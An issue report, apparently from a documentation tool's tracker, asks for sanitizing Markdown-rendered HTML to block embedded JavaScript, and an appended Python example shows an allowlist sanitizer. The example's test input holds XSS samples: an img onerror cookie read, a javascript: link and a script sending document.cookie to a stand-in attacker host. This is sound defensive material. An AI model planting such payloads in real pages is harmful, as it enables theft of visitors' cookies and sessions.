Description
Is your change request related to a problem? Please describe.
I recently discovered in this mind-bending issue that most Markdown implementations don't sanitize their output, with Python-Markdown being no exception. This means that (contrary to popular belief), Markdown text cannot be trusted to be safe.
While developers should be careful to only accept merges after thoroughly reviewing code, there are lots of ways to subtly embed JS into documents, which can be easily overlooked (e.g. using onerror in an <img> tag). I cannot think of any non-malicious reason to embed executing JS code within documentation Markdown, when it is so much easier to bundle additional JS using mkdocs (which reviewers would be much more suspicious of, and therefore much more careful about).
Describe the solution you'd like
Sanitize the Markdown output within documentation to prevent executable JS code from being embedded in the output. Perhaps mozilla/bleach can be used.
Describe alternatives you've considered
Do nothing, but document that docstrings cannot be blindly trusted to be safe, as JS can be embedded within them.
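An added example, not code from the issue author or from the project: an allowlist sanitizer, built only on the Python standard library, run over the kind of HTML a Markdown renderer emits when a docstring carries the `<img onerror>` trick the report mentions. The input string is constructed here to stand in for renderer output (the `markdown` package is not invoked), and the tag and attribute allowlist, the `sanitize` name and the sample payloads are assumptions for illustration. In a real deployment the same policy would normally be expressed with a maintained library such as bleach, as the report suggests; the point of the stdlib version is to show what "sanitize the output" has to do: drop event-handler attributes, drop `javascript:` URLs, and drop `<script>` together with its contents, while leaving the code blocks and links documentation needs.

```python
"""Allowlist sanitizer for HTML produced by a Markdown renderer.

Added example, not code from the project or the issue author. Uses only
the standard library so it runs offline; the allowlist below is an
assumption chosen for illustration, not the project's policy.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags documentation pages legitimately need (constructed allowlist).
ALLOWED_TAGS = {
    "p", "a", "img", "code", "pre", "em", "strong", "ul", "ol", "li",
    "h1", "h2", "h3", "h4", "blockquote", "table", "thead", "tbody",
    "tr", "th", "td", "br", "hr", "span", "div",
}
# Attributes allowed per tag; anything else (on*, style, ...) is dropped.
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "title"},
    "code": {"class"}, "pre": {"class"}, "span": {"class"}, "div": {"class"},
    "th": {"align"}, "td": {"align"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" = relative URL
VOID_TAGS = {"img", "br", "hr"}
# These tags are removed together with everything inside them.
DROP_CONTENT_TAGS = {"script", "style"}


def _url_is_safe(value: str) -> bool:
    # HTMLParser has already decoded entities, so "javascript&#58;" is seen
    # as "javascript:" here; strip() removes leading whitespace tricks.
    return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return                      # unknown tag: emit nothing
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # drops onerror, onclick, style, ...
            value = value or ""
            if name in URL_ATTRS and not _url_is_safe(value):
                continue                # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if self._drop_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))   # re-escape text


def sanitize(html: str) -> str:
    """Return html with only allowlisted tags/attributes/URL schemes."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out)


# Constructed stand-in for what a Markdown renderer emits for a docstring
# that mixes normal documentation with raw-HTML payloads.
RENDERED = (
    '<p>See the <a href="https://example.com/docs" title="docs">docs</a>.</p>\n'
    '<p><img src="x" onerror="alert(document.cookie)" alt="logo"></p>\n'
    '<p><a href="javascript:alert(1)">click</a></p>\n'
    '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>\n'
    '<pre><code class="language-python">x = 1 &lt; 2</code></pre>'
)

if __name__ == "__main__":
    print(sanitize(RENDERED))
```

Running the block prints the same page with the `onerror` attribute, the `javascript:` href and the whole `<script>` element gone, while the link, the image and the fenced code block (including its escaped `&lt;`) survive. A sanitizer of this shape works on the renderer's output, not on the Markdown source, which is what makes it robust against the many ways raw HTML can be smuggled through a Markdown dialect.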